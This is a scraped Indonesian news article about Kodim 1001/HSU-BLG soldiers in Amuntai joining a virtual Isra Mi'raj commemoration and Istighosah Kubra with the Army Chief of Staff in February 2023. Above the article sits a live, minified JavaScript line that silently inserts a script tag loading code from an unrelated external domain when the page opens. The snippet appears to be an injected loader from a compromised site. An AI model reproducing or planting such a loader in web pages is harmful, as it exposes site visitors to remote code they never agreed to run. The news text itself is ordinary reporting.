(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Hulu Sungai Utara

Jajaran Kodim 1001 Ikuti Peringatan Isra mikraj dan Istighosah Kubra bersama Kasad


KANALKALIMANTAN.COM, AMUNTAI – Puluhan personel Kodim 1001/HSU-BLG khusyum mengikuti  peringatan Isra Mi’raj Nabi Muhammad SAW dan Istighosah Kubra yang digelar secara virtual bersama Kasad Jenderal TNI Dudung Abdurachman.

Kegiatan yang digelar di aula Makodim 1001, Minggu (19/2/2023) dihadiri Dandim 1001 Letkol Inf Dhuwi Hendradjaja, Pj Bupati HSU yang diwakili Kepala Bagian Kesra Setda HSU, Hermansyah Budi, serta perwakilan Forkopimda setempat.

Acara diawali dengan doa untuk keselamatan bangsa dirangkai peringatan Isra Mikraj Nabi Muhammad SAW secara virtual yang dipusatkan di Masjid Agung Cianjur, Jawa Barat.

Dandim 1001/HSU-BLG, Letkol Inf Dhuwi Hendradjaja mengatakan, kegiatan ini dilaksanakan dalam memperingati Isra Mikraj secara serentak di setiap masing-masing satuan yang diikuti oleh TNI, Polri, Pemda serta tokoh agama dan tokoh Masyarakat.

 

Baca juga: Naufa dan Aidha Terpilih sebagai Putra Putri Pariwisata HSU 2023

Kegiatan ini salah satu upaya untuk semakin meningkatkan keimanan dan ketaqwaan pada diri hal tersebut sesuai dengan arahan yang disampaikan oleh Kasad TNI. “Salah satu caranya adalah dengan memperingati hari besar keagamaan seperti Isra Miraj Nabi Muhammad SAW,” ungkap Dandim.

Lebih lanjut, dikatakannya bahwa dengan memperingati Isra Mikraj Nabi Muhammad SAW, diharapakan sebagai umat Islam dapat mengambil nilai-nilai positif dan menginplementasikan apa yang sudah dicontohkan oleh Nabi Besar Muhammad SAW dalam kehidupan sehari- hari.

“Dengan bermodalkan keimanan dan ketaqwaan kepada Tuhan Yang Maha Esa, diharapkan prajurit Kodim dapat mengemban tugasnya dengan baik, senantiasa berada ditengah-tengah masyarakat guna memberikan solusi bagi permasalahan warga dalam bentuk apapun, sehingga akan timbul kecintaan rakyat terhadap TNI,” pungkasnya.

Adapun kegiatan istighosah kubra yang diselenggarakan oleh Majelis Ulama Indonesia (MUI) bersama TNI tersebut turut dihadiri Wakil Presiden RI KH Ma’ruf Amin.

Baca juga: Malam Grand Final Pemilihan Putra Putri Pariwisata HSU 2023

Wapres Kiai Ma’ruf Amin menilai pentingnya acara yang terselenggara atas kerjasama antara TNI Angkatan Darat dengan MUI bidang dakwah dan Ukhuwah tersebut.

Menurutnya, doa istighosah ini merupakan momen penting untuk memperkuat persatuan umat dalam menghadapi berbagai persoalan bangsa ini. Salah satunya bangkit pasca gempa Cianjur yang terjadi akhir 2022 lalu.

Dirinya berharap melalui momen ini dapat memantapkan masyarakat untuk bangkit dari musibah bencana dengan cara terus bertawakal, berupaya dan berdoa. (Kanalkalimantan.com/dew)

Reporter: dew
Editor: bie


Al Ghifari

Recent Posts

3 Juni Hari Sepeda Sedunia, Ini Sejarahnya

KANALKALIMANTAN.COM - Tak banyak yang tahu 3 Juni diperingati Hari Sepeda Sedunia. Sepeda menjadi alat… Read More

12 jam ago

Bawaslu HSU: PKD Harus Maksimal Lakukan Pengawasan Pelanggaran

KANALKALIMANTAN.COM, AMUNTAI - Pengawas Keluarahan Desa (PKD) pada Pemilihan Kepala Daerah (Pilkada) 2024 diharuskan melakukan… Read More

12 jam ago

Pelebaran dan Pengerasan Jalan TMMD di Desa Sungai Karias Selesai

KANALKALIMANTAN.COM, AMUNTAI - Pengerjaan jalan TNI Manunggal Membangun Desa (TMMD) ke-120 Kodim 1001/HSU-Balangan di Desa… Read More

12 jam ago

Arab Saudi Tahan 37 WNI Pemegang Visa Ziarah, Uang Hilang Haji Melayang

Konjen RI Jeddah: Denda 10.000 Riyal, Deportasi, dan Diblokir Selama 10 Tahun Read More

13 jam ago

20 PKD se Kota Banjarbaru Dilantik, Pengawasan Kontestasi Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Badan Pengawas Pemilu (Bawaslu) Kota Banjarbaru resmi melantik 20 anggota Pengawas Kelurahan… Read More

13 jam ago

219 Pengawas Kelurahan Desa se Kabupaten HSU Dilantik

KANALKALIMANTAN.COM, AMUNTAI – Pengawas Kelurahan Desa (PKD) di 219 desa dan kelurahan se Kabupaten Hulu… Read More

14 jam ago

This website uses cookies.